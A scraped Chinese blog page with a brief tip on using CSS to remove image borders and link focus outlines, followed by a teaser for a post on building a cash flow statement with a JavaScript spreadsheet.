‌1、通过CSS去除边框‌:在CSS中为img标签添加border:0 none;样式,例如:img{border:0 none;这种方法适用于大多数现代浏览器‌12。3‌、通过JavaScript去除点击后的虚线框‌:在a标签中添加outline:none;和text-decoration:none;这可以同时去除点击后的虚线框和下划线‌。
探秘纯前端Excel表格:构建现金流量表的完整指南
葡萄城技术团队博客
10-10 604
现金流量表(Cash Flow Statement),是指反映企业在一定会计期间现金和现金等价物流入和流出的报表。现金流量表是企业财务报表的三个基本报告之一(另外两个是资产负债表和损益表)。为了全面系统地揭示企业一定时期的财务状况、经营成果和现金流量,财务报表需按财政部会计准则的标准格式设计,因此,财务报表的典型特征是数据更新频繁、分析维度多、数据来源复杂,常规的报表工具很难同时满足上述所有需求本博客将带大家了解如何使用类Excel 的 JavaScript 电子表格在前端创建现金流日历。。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

半两八金

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值